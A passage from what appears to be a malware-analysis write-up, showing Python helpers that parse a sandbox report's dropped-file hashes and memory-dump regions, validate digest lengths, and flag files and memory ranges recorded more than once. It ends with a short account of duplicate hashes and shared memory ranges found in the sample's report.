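SHA256 5ecda62f6fd2822355c560412f6d90be46a7f763f0ffeec9854177904632ac2d
SHA512 5d6e32f9ff90a9a584183dad1583aea2327b4aea32184b0ebbec3df41b0b833e6bb3cd40822dd64d1033125f52255812b17e4fa0add38fcda6bab1724dfaa2eb
"""


def parse_files_section(text):
    """Return (files, regions): files are dicts with "path" plus whichever of
    md5/sha1/sha256/sha512 were present; regions are {"pid","index","start","end"}."""
    files, regions, current = [], [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            pid, idx, start, end = m.groups()
            regions.append({"pid": int(pid), "index": int(idx),
                            "start": int(start, 16), "end": int(end, 16)})
            current = None                                 # a dump line ends the file record
            continue
        m = HASH_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2).lower()
            continue
        if PATH_RE.match(line):
            current = {"path": line}
            files.append(current)
    return files, regions


def validate(files):
    """Digests with the wrong hex length are truncated copies, not usable IOCs."""
    problems = []
    for f in files:
        for algo, want in HASH_LEN.items():
            digest = f.get(algo.lower())
            if digest is not None and len(digest) != want:
                problems.append(f"{f['path']}: {algo} has {len(digest)} hex chars, expected {want}")
    return problems


def path_collisions(files):
    """Paths reported with more than one SHA256 (overwritten between drops)."""
    seen = defaultdict(set)
    for f in files:
        if "sha256" in f:
            seen[f["path"]].add(f["sha256"])
    return {p: sorted(h) for p, h in seen.items() if len(h) > 1}


def shared_regions(regions):
    """Identical (start, end) ranges dumped from more than one PID."""
    by_range = defaultdict(set)
    for r in regions:
        by_range[(r["start"], r["end"])].add(r["pid"])
    return {k: sorted(v) for k, v in by_range.items() if len(v) > 1}


def region_size(region):
    return region["end"] - region["start"]


def pyinstaller_dirs(files):
    """Distinct _MEIxxxxx directories seen in the dropped-file paths."""
    found = set()
    for f in files:
        m = MEI_RE.search(f["path"])
        if m:
            found.add(m.group(1))
    return sorted(found)


if __name__ == "__main__":
    files, regions = parse_files_section(SAMPLE)
    print(len(files), "files,", len(regions), "memory regions;", "problems:", validate(files))
    print("path collisions:", path_collisions(files))
    print("shared regions:", {hex(k[0]): v for k, v in shared_regions(regions).items()})
    print("pyinstaller dirs:", pyinstaller_dirs(files))
```

Run over the full section rather than the excerpt, the same checks show why one hash per filename is not enough here: Win (3).exe is recorded three times with three different SHA256 values, python311.dll appears twice under _MEI52802 with different digests, and the range 0x00007FFE63970000-0x00007FFE64431000 (0xAC1000 bytes) is dumped from eleven distinct PIDs in this section alone. The parser takes path lines literally, so entries such as C:\Users\Admin\AppData\Local\Tempcsowjmysgs.db are kept as printed rather than "corrected"; whether that is a missing separator in the report or in the dropper is not something the listing settles.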